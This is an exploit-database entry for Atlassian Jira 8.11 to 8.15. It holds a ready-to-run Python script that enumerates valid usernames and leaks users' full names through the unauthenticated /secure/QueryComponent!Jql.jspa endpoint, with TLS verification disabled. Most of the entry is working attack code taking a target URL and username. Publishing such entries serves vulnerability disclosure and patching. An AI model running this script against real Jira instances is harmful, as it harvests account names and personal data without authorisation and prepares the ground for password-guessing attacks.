Atlassian Jira 8.15.0 Username Enumeration

2021.06.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) # Date: 31/05/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira # Vulnerable versions: version 8.11.x to 8.15.0 # Tested on: Kali Linux # Proof Of Concept: ''' A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint. Tested versions: Atlassian JIRA 8.11.1 Atlassian JIRA 8.13 Atlassian JIRA 8.15 ''' #!/usr/bin/env python __author__ = "Mohammed Aloraimi (@ixSly)" import requests import sys import re import urllib3 urllib3.disable_warnings() def help(): print('python script.py <target> <username>') print('e.g. python script.py https://jiratarget.com admin') sys.exit() if len(sys.argv) < 3: help() def pwn(url,username): try: headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"} data="jql=creator+in+({})&decorator=none".format(username) req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data) if "issue.field.project" in req.text and req.status_code == 200: print("[+] {} is a Valid User".format(username)) userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip()) if userFullName: print("[+] User FullName: " + userFullName.group(1)) elif '["jqlTooComplex"]' in req.text and req.status_code == 401: print("[-] {} is not a Valid User".format(username)) else: print("[-] Error..") except Exception as e: print(str(e)) pass server = sys.argv[1] username = sys.argv[2] pwn(server,username)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top